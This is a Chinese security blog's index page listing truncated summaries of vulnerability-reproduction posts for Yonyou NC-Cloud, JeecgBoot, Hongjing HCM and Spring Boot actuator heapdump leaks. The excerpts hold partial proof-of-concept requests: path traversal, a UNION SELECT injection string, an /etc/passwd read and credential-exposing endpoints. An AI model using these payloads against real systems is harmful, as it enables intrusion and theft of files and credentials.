会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
pa0fu
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
2024年6月26日
用友-NC-Cloud存在soapFormat-XXE 导致任意文件读取漏洞
摘要: 漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
阅读全文
posted @ 2024-06-26 16:21 都吃泡芙
阅读(208)
评论(0)
推荐(0)
2024年6月22日
JeecgBoot-queryFieldBySql-远程命令执行-RCE漏洞
摘要: 影响范围: 3.0.0 <= jeecg-boot <= 3.5.3 2.4.x <= jeecg-boot <= 2.4.6 POC: POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 Host: ip Pragma: no-cache Cach
阅读全文
posted @ 2024-06-22 14:07 都吃泡芙
阅读(888)
评论(0)
推荐(1)
2024年6月14日
宏景HCM DisplayFiles任意文件读取
摘要: 漏洞复现: POC: POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/
阅读全文
posted @ 2024-06-14 16:23 都吃泡芙
阅读(162)
评论(0)
推荐(0)
2024年6月13日
宏景HCM pos_dept_post sql注入漏洞
摘要: 漏洞复现: poc: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW
阅读全文
posted @ 2024-06-13 14:33 都吃泡芙
阅读(185)
评论(0)
推荐(0)
2024年6月12日
宏景HCM OutputCode任意文件读取漏洞
摘要: 漏洞复现: 1、读取/etc/passwd http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP 其中path字段加密通过下面工具来实现 工具地址:https://github.
阅读全文
posted @ 2024-06-12 09:22 都吃泡芙
阅读(283)
评论(0)
推荐(0)
2024年6月6日
宏景HCM codesettree sql注入
摘要: 适用范围:宏景eHR < 8.2 登录页面 查询cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2
阅读全文
posted @ 2024-06-06 18:02 都吃泡芙
阅读(87)
评论(0)
推荐(0)
Spring Boot heapdump泄露内存分析方法
摘要: 一、查看加密星号信息(适用于数据库密码、ftp、ssh) 1.首先访问地址:http://url/actuator/env 出现一些配置信息,搜索带有****** 可以看到ftp的ip,username,password 2.接着访问http://url/actuator/heapdump 下载下来
阅读全文
posted @ 2024-06-06 11:38 都吃泡芙
阅读(568)
评论(2)
推荐(1)
上一页
1
2
公告
//雪花飘落效果 //雪花飘落效果